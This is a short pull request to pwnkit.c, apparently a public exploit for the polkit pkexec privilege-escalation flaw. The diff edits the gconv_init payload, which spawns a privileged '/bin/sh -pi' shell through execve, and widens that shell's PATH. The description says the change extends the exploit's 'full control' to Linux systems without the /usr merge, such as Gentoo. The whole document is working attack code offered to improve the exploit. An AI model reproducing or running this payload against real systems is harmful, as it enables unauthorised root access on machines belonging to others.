### PR TITLE
pwnkit: Adds full PATH support

### DIFF
--- a/pwnkit.c
+++ b/pwnkit.c
@@ -8,7 +8,7 @@ void gconv(void) {
 void gconv_init(void *step)
 {
 	char * const args[] = { "/bin/sh", "-pi", NULL };
-	char * const environ[] = { "PATH=/bin:/usr/bin", NULL };
+	char * const environ[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin", NULL };
 	execve(args[0], args, environ);
 	exit(0);
 }


### PR DESCRIPTION
```md
This will take full control of executables on certain Linux systems that
don't use /usr merge as their filesystem layout, for example Gentoo.
```

https://wiki.gentoo.org/wiki//usr_move#Current_filesystem_layout
https://freedesktop.org/wiki/Software/systemd/TheCaseForTheUsrMerge